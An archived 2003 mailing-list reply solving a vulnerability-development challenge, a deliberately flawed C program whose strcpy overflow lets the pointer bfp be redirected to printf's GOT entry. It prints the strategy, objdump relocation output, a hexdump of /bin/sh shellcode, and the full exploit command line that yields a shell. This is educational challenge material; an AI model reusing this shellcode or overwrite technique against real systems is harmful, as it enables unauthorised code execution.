Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Jason_Royes <jroyes () da-experts com>
Date: 24 May 2003 01:05:54 -0400
Strategy was to overwrite printf pointer with shellcode address. 1) Overwrite pointer held in bfp with strcpy(buf, argv[1]). before: [buf][bfp][ret] after: [buf][&printf - 2][ret] Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf 2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1), f1 contains address of argv[1] or buf. 3) printf is then called which gives a shell. Note that a BUFSIZE of 90 actually allocates 92 bytes on the stack. /* vulndev2.c */ #include <stdio.h> #include <stdlib.h> #define BFSIZE 90 int main(int argc, char *argv[]) { char *bfp; char buf[BFSIZE]; FILE *f1; if (argc != 3) return 1; if ( (bfp = malloc(BFSIZE)) == NULL) return 1; /* debug */ printf("bfp = %p, buf = %p\n", bfp, buf); /* log input */ if ( (f1 = fopen("db.log", "a+")) == NULL) return 1; fprintf(f1, ";;%s;;", argv[2]); fclose(f1); strcpy(buf, argv[1]); /* read log */ if ( (f1 = fopen("db.log", "r")) == NULL) return 1; if (fgets(bfp, BFSIZE, f1) == NULL) return 1; printf("%s\n", bfp); fclose(f1); exit(1); } ## jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2 vd2: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049874 R_386_GLOB_DAT __gmon_start__ 08049848 R_386_JUMP_SLOT __register_frame_info 0804984c R_386_JUMP_SLOT fprintf 08049850 R_386_JUMP_SLOT malloc 08049854 R_386_JUMP_SLOT __deregister_frame_info 08049858 R_386_JUMP_SLOT fgets 0804985c R_386_JUMP_SLOT __libc_start_main 08049860 R_386_JUMP_SLOT printf 08049864 R_386_JUMP_SLOT fclose 08049868 R_386_JUMP_SLOT exit 0804986c R_386_JUMP_SLOT fopen 08049870 R_386_JUMP_SLOT strcpy jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell 00000000 31 db 31 c9 b0 46 cd 80 31 c0 50 68 2f 73 68 ff |1.1..F..1.Ph/sh.| 00000010 88 44 24 03 68 2f 62 69 6e 89 e3 50 53 89 e1 31 |.D$.h/bin..PS..1| 00000020 d2 b0 0b cd 80 |.....| 00000025 jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"` bfp = 0x8049898, buf = 0xbffffa6c sh-2.05a$ exit jroyes@tadpole:~/study/vuln-dev/cha2$ ## Thanks to sin for the tiny shellcode. On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
We are announcing the second challenge. Initially, we wanted to have this out a few days ago but were involved in testing it on multiple platforms. This challenge is a little easier than the first one, since we'd like to see more people attempting to produce a proof-of-concept. If you find it too easy, you're welcome to attempt it in an environment with a non-executable stack/heap to raise the bar a little. Here's a link to the basic guidelines (for those who missed it): http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0 (also, please retain the [Vuln-dev Challenge] string in the subject line for replies to make for easier filtering for those not interested in challenge related discussion.) --- /* vulndev2.c */ #include <stdio.h> #include <stdlib.h> #define BFSIZE 90 int main(int argc, char *argv[]) { char *bfp; char buf[BFSIZE]; FILE *f1; if (argc != 3) return 1; if ( (bfp = malloc(BFSIZE)) == NULL) return 1; /* log input */ if ( (f1 = fopen("db.log", "a+")) == NULL) return 1; fprintf(f1, ";;%s;;", argv[2]); fclose(f1); strcpy(buf, argv[1]); /* read log */ if ( (f1 = fopen("db.log", "r")) == NULL) return 1; if (fgets(bfp, BFSIZE, f1) == NULL) return 1; printf("%s\n", bfp); fclose(f1); exit(1); } --- Dave McKinney Symantec keyID: BF919DD7 key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
-- Jason Royes Data Access Experts http://www.da-experts.com/
Current thread:
- [Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Gera's Insecure Programing abo7 sin (May 30)